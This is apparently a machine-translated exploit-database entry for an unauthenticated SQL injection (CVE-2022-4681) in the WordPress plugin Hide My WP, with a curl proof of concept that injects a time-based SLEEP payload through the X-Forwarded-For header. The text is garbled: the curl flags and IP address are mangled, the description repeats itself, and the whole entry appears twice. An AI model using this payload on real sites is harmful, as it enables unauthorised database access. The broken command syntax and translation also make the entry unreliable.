#exploit title: WordPress插件隐藏我的WP 6.2.9-未经身份验证的SQLI
#出版日期: 2023-01-11
#原始研究人员: Xenofon Vassilakopoulos
#利用作者: Xenofon Vassilakopoulos
#subtter: Xenofon Vassilakopoulos
#供应商homepage: https://wpwave.com/
#版本:隐藏我的WP v6.2.8和先验
#测试在:隐藏我的WP v6.2.7
#Impact:数据库访问
#CVE: CVE-2022-4681
#CWE: CWE-89
#CVSS得分: 8.6(高)
## 描述
该插件在通过使用未经身份验证的用户可用的AJAX操作中在SQL语句中使用该插件在SQL语句中使用该插件,从而导致SQL注入。
##概念证明
curl -k- -pocation-重新获得'http://localhost:10008' - -Header'X-Forwarded-For: 127.0.0.1.1.1'+(select*from(select(select(Sleep(20))A)+'''''''''''''''''''''''
#出版日期: 2023-01-11
#原始研究人员: Xenofon Vassilakopoulos
#利用作者: Xenofon Vassilakopoulos
#subtter: Xenofon Vassilakopoulos
#供应商homepage: https://wpwave.com/
#版本:隐藏我的WP v6.2.8和先验
#测试在:隐藏我的WP v6.2.7
#Impact:数据库访问
#CVE: CVE-2022-4681
#CWE: CWE-89
#CVSS得分: 8.6(高)
## 描述
该插件在通过使用未经身份验证的用户可用的AJAX操作中在SQL语句中使用该插件在SQL语句中使用该插件,从而导致SQL注入。
##概念证明
curl -k- -pocation-重新获得'http://localhost:10008' - -Header'X-Forwarded-For: 127.0.0.1.1.1'+(select*from(select(select(Sleep(20))A)+'''''''''''''''''''''''